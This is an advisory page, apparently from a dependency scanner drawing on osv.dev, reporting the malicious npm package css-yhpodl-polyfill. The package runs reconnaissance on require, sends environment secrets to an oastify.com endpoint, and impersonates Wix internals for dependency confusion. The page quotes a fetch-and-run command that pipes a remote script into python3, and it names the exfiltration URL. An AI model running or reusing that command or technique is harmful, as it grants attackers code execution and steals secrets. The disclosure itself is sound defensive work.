Logo
npm

css-yhpodl-polyfill@1.0.0

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 8:28 PM UTC

Malicious

OSV ID

MAL-2026-17578

Ecosystem

npm

Summary

css-yhpodl-polyfill ships thunderboltRegistry.js which, as an IIFE executed on require, runs shell reconnaissance (id, whoami, env, ifconfig/ip addr, hostname) via child_process.execSync and sends the collected host identity and full environment variables via GET to the hardcoded Burp Collaborator OAST endpoint https://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9.oastify.com/. The same file executes curl -L https://appsecc.com/py | python3, piping an attacker-controlled remote Python payload into python3 for arbitrary code execution on the installer host. The package name and exported identifiers (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) impersonate Wix's internal thunderbolt namespace, and registry-manifest.min.json references parastorage.com (Wix CDN) — the shape of a targeted dependency-confusion attack against the Wix engineering build pipeline. Installing or requiring this package exfiltrates environment secrets and grants remote code execution to the attacker.

Source: amazon-inspector (5936fc65b4eba7b461c0eef7b66dfeecdc2da412f54fd667873e3e6950b0a857)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.